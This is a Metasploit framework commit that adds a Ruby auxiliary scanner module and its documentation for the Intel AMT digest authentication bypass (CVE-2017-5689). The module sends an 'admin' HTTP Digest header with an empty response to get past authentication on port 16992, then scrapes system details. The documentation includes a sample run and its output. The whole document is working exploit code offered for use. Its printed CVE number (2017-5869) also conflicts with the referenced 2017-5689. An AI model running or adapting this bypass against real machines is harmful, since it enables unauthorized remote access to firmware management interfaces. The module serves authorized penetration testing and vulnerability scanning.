Land #8353, add aux scanner for Intel AMT digest bypass

documentation/modules/auxiliary/scanner/http/intel_amt_digest_bypass.md

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+This module exploits vulnerable versions of the Intel Management Engine (ME) firmware present Intel Core CPU 1st through 7th generations that allows authentication bypass and full control over the target machine, if the Active Management Technology feature is enabled and networking is configured.
+
+**Vulnerable Application Installation Steps**
+
+Enable the feature in the firmware setup screen on any vulnerable target machine. The module has been tested on HP and Lenovo desktops and laptops.
+
+## Verification Steps
+
+A successful run of the module will look like this:
+
+
+```
+msf auxiliary(telnet_version) > use auxiliary/scanner/http/intel_amt_digest_bypass
+msf auxiliary(intel_amt_digest_bypass) > show options
+
+Module options (auxiliary/scanner/http/intel_amt_digest_bypass):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    16992            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   VHOST                     no        HTTP server virtual host
+
+msf auxiliary(intel_amt_digest_bypass) > set rhosts 192.168.1.18
+rhosts => 192.168.1.18
+msf auxiliary(intel_amt_digest_bypass) > run
+
+[+] 192.168.1.18:16992 - Vulnerable to CVE-2017-5869 {"Computer model"=>"30A70051US", "Manufacturer"=>"LENOVO", "Version"=>"A4KT80AUS", "Serial number"=>"                    ", "System ID"=>"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "Product name"=>"To be filled by O.E.M.", "Asset tag"=>"                         ", "Replaceable?"=>"Yes", "Vendor"=>"LENOVO", "Release date"=>"09/23/2015"}
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb

@@ -0,0 +1,118 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Intel AMT Digest Authentication Bypass Scanner',
+      'Description' => %q{
+        This module scans for Intel Active Management Technology endpoints and attempts
+        to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
+        can be found on ports 16992, 16993 (tls), 623, and 624(tls).
+      },
+      'Author'      => 'hdm',
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2017-5689' ],
+          [ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
+          [ 'URL', 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr' ],
+        ],
+      'DisclosureDate' => 'May 05 2017'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(16992),
+      ])
+  end
+
+  # Fingerprint a single host
+  def run_host(ip)
+    begin
+      connect
+      res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })
+      unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')
+        disconnect
+        return
+      end
+
+      vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")
+
+      unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/
+        vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")
+        disconnect
+        return
+      end
+
+      realm = $1
+      nonce = $2
+      cnonce = Rex::Text.rand_text(10)
+
+      res = send_request_raw(
+        {
+          'uri'     => '/hw-sys.htm',
+          'method'  => 'GET',
+          'headers' => {
+            'Authorization' =>
+              "Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +
+              "cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""
+          }
+        })
+
+      unless res && res.body.to_s.index("Computer model")
+        vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")
+        return
+      end
+
+      proof = res.body.to_s
+      proof_hash = nil
+
+      info_keys = res.body.scan(/<td class=r1><p>([^\<]+)<\/p>/).map{|x| x.first.to_s.gsub("&#x2F;", "/") }
+      if info_keys.length > 0
+        proof_hash = {}
+        proof = ""
+
+        info_vals = res.body.scan(/<td class=r1>([^\<]+)</).map{|x| x.first.to_s.gsub("&#x2F;", "/") }
+        info_keys.each do |ik|
+          iv = info_vals.shift
+          break unless iv
+          proof_hash[ik] = iv
+          proof << "#{iv}: #{ik}\n"
+        end
+      end
+
+      print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5869 #{proof_hash.inspect}")
+
+      report_note(
+        :host  => ip,
+        :proto => 'tcp',
+        :port  => rport,
+        :type  => 'intel.amt.system_information',
+        :data  => proof_hash
+      )
+
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Intel AMT Digest Authentication Bypass",
+        :refs  => self.references,
+        :proof => proof
+      })
+
+    rescue ::Timeout::Error, ::Errno::EPIPE
+    ensure
+      disconnect
+    end
+  end
+
+end